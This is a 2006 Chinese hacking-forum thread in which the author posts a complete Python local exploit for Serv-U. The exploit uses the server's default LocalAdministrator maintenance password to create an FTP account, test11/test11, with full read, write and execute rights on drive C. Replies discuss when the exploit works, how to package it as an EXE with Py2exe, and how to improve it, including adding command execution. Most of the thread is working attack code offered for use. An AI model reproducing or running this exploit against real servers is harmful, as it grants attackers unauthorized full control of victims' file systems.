[原创]Python版的Serv-U提权BY pt007

pt007

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 216
精华: 30
积分: 3924
阅读权限: 100
性别: 男
在线时间: 443 小时
注册时间: 2005-9-9
最后登录: 2008-12-15

发短消息
加为好友
当前离线

楼主大中小发表于 2006-9-29 23:56 只看该作者

[原创]Python版的Serv-U提权BY pt007

文章作者：pt007
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

#!c:\python24\python
#Python Serv-U All Version Local Exploit
#Author:pt007版权所有,转载请注明版权信息
#Version:1.0
#Usage:servu.py 127.0.0.1 43958

import sys
import os
import socket
import time

def usage(programname):
print 'Python Serv-U All Version Local Exploit V1.0'
print 'Auther:pt007 QQ:7491805'
print 'Usage:%s 127.0.0.1 43958\r\n' %programname

buffer1='USER LocalAdministrator\r\n'
time.sleep(1)
buffer11='''PASS #l@$ak#.lk;0@P\r\n'''
time.sleep(1)
buffer2='SITE MAINTENANCE\r\n'
time.sleep(1)
buffer3='''\
-SETUSERSETUP\r\n
-IP=127.0.0.1\r\n
-PortNo=21\r\n
-User=test11\r\n
-Password=test11\r\n
-HomeDir=c:\\\r\n
-LoginMesFile=\r\n
-Disable=0\r\n
-RelPaths=0\r\n
-NeedSecure=0\r\n
-HideHidden=0\r\n
-AlwaysAllowLogin=0\r\n
-ChangePassword=1\r\n
-QuotaEnable=0\r\n
-MaxUsersLoginPerIP=-1\r\n
-SpeedLimitUp=-1\r\n
-SpeedLimitDown=-1\r\n
-MaxNrUsers=-1\r\n
-IdleTimeOut=600\r\n
-SessionTimeOut=-1\r\n
-Expire=0\r\n
-RatioUp=1\r\n
-RatioDown=1\r\n
-RatiosCredit=0\r\n
-QuotaCurrent=0\r\n
-QuotaMaximum=0\r\n
-Maintenance=System\r\n
-PasswordType=Regular\r\n
-Ratios=None\r\n
Access=c:\\|RWAMELCDP\r\n
QUIT\r\n'''

def main():
if len(sys.argv)!=3:
   usage(sys.argv[0])
   sys.exit(1)

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) #建立TCP连接,IPv4,TCP
try:
   s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))  #连接到指定的IP和端口
   s.send(buffer1)
   s.send(buffer11)
   s.send(buffer2)
   s.send(buffer3)
   time.sleep(1)

except:
   print 'socket.error'
   sys.exit(2)

print '成功加入FTP用户test11/test11!:)'


if __name__ == "__main__":main()

每个人都有属于自已的世界，人生因此而精彩，HACK就是我的世界！

TOP

remax

晶莹剔透§烈日灼然

Rank: 1

帖子: 324
精华: 2
积分: 907
阅读权限: 50
在线时间: 79 小时
注册时间: 2005-10-25
最后登录: 2008-7-13

发短消息
加为好友
当前离线

沙发大中小发表于 2006-9-30 20:26 只看该作者

servu貌似加了密码就没得搞。。没加密码随便搞。。

20字节够写什么？

TOP

netxfly

技术核心组

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 306
精华: 12
积分: 4110
阅读权限: 200
性别: 男
在线时间: 260 小时
注册时间: 2005-1-20
最后登录: 2008-12-26

原创技术奖技术活跃奖

发短消息
加为好友
当前离线

椅子大中小发表于 2006-10-5 16:33 只看该作者

引用:

这里是引用第[2 楼]的xiaocool于2006-10-05 15:20发表的：
在什么环境下好用??

一般Windows主机没有Python环境
你可以用Py2exe把楼主的代码编译成EXE，不过体积会好大，而且带个DLL

Py2exe可以在http://www.py2exe.org/下载到.

TOP

我非我

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 150
精华: 6
积分: 5639
阅读权限: 100
性别: 男
在线时间: 189 小时
注册时间: 2005-2-4
最后登录: 2008-1-31

发短消息
加为好友
当前离线

板凳大中小发表于 2006-10-10 18:39 只看该作者

py写serv-u提权的确没什么意义.不过我估计楼主也不过是想练练py编程而已. :)
另外,lz写的这个程序还有点问题:
-IP=127.0.0.1
-PortNo=21
这里两项应该是根据对方ftp域ip决定的,而不是一概而论.
-HomeDir=c:
这里,万一系统盘不在c:,那么还得自己上传shell.比较麻烦,最好加个判断环境变量让程序自己修改
另外最好添加个利用此用户执行命令的功能,这样一个exp才完整

http://www.phpweblog.net/GaRY/

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 论坛原创{ Original Paper } » [原创]Python版的Serv-U提权BY pt007